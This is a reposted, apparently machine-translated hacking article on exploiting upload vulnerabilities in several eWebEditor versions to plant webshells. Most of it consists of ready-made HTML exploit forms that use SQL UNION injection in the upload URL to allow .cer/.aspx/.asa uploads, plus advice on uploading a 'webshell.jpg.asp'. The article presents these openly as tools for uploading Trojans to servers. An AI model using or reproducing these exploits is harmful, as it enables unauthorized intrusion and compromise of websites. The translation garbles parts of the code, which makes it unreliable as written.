Use of the eWebEditor upload vulnerability when the database is read-only

Source: Internet
Author: User

You may often encounter situations where there is an ewebeditor but there is no way to update the style. This is often because the administrator sets the database as read-only for security purposes. Even if it is read-only, we can make a breakthrough. Theoretically, it can be used as long as the conditions are met and the database is the same, and the version number is not necessarily the same. As described in the following versions, you can save the file as an htm file:
1. ewebeditor 1.0.0 Upload Vulnerability: this vulnerability is based on the exp of the ice origin.
<H1> ewebeditor asp version 1.0.0 Upload Vulnerability exploitation program -- By HCocoa </H1> <br>
<Form action = "http: // address to be uploaded/ewebeditor/upload. asp? Action = save & type = IMAGE & style = hcocoa 'Union select S_ID, S_Name, S_Dir, S_EditorHeader, S_Body, S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt] % 2b '| cer | aspx', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, s_DetectFromWord from ewebeditor_style where s_name = 'standard' and 'a = 'a "method = post name = myform enctype =" multipart/form-data ">
<Input type = file name = previusfile size = 100> <br>
<Input type = submit value = Fuck>
</Form>
2. ewebeditor 2.1.6 Upload Vulnerability: this vulnerability is still written at the ice origin, and is found everywhere on the Internet:
<HTML> <HEAD> <TITLE> ewebeditor's upload File upload exp </TITLE> <meta http-equiv = "Content-Type" content = "text/html; charset = gb2312 "> <Tr> the version is different if it is not a killer! I'm depressed. JJ said the article was not clear, and this EXP was written according to the article! What's the difference between the EXP of the fallen guy I haven't seen for a long time! <Br> </tr>
<Tr> the file is transferred to the previusfile directory </tr> <br>
<Tr> I don't know if the calculation is zero day. I am the ice's origin </tr> <br>
<Tr> the method to use is to modify the action in the source file, and then pass the cer's Trojan! </Tr> <br>
<Form action = "http: // URL to be uploaded/ewebeditor/upload. asp? Action = save & type = IMAGE & style = firefox '% 20 union % 20 select % 20S_ID, S_Name, S_Dir, S_CSS, S_UploadDir, S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, s_FlashExt, % 20 [S_ImageExt] % 2b '| cer', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, s_BaseUrl % 20 from % 20ewebeditor_style % 20 where % 20s_name = 'standard' % 20and % 20' a' = a "method = post name = myform enctype =" multipart/form-data"> <input type = file name = previusfile size = 100 style = "width: 100% "> <input type = submit value = transfer it> </form>
3. ewebeditor 2.7.5 Upload Vulnerability: the author is not familiar with this vulnerability when the user can upload the asa but the prompt does not have a toolbar.
<Form action = "http: // URL to be uploaded/ewebedit/upload. asp? Action = save & type = & style = style name for uploading asa "method = post name = myform enctype =" multipart/form-data ">
<Input type = file name = previusfile size = 1 style = "width: 100%">
<Input type = submit value = "uploaded"> </input>
</Form>
4. ewebeditor 2.8.0 Upload Vulnerability: You need to enable remote upload and then upload webshell.jpg. asp. You can view the source code to obtain the shell address.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.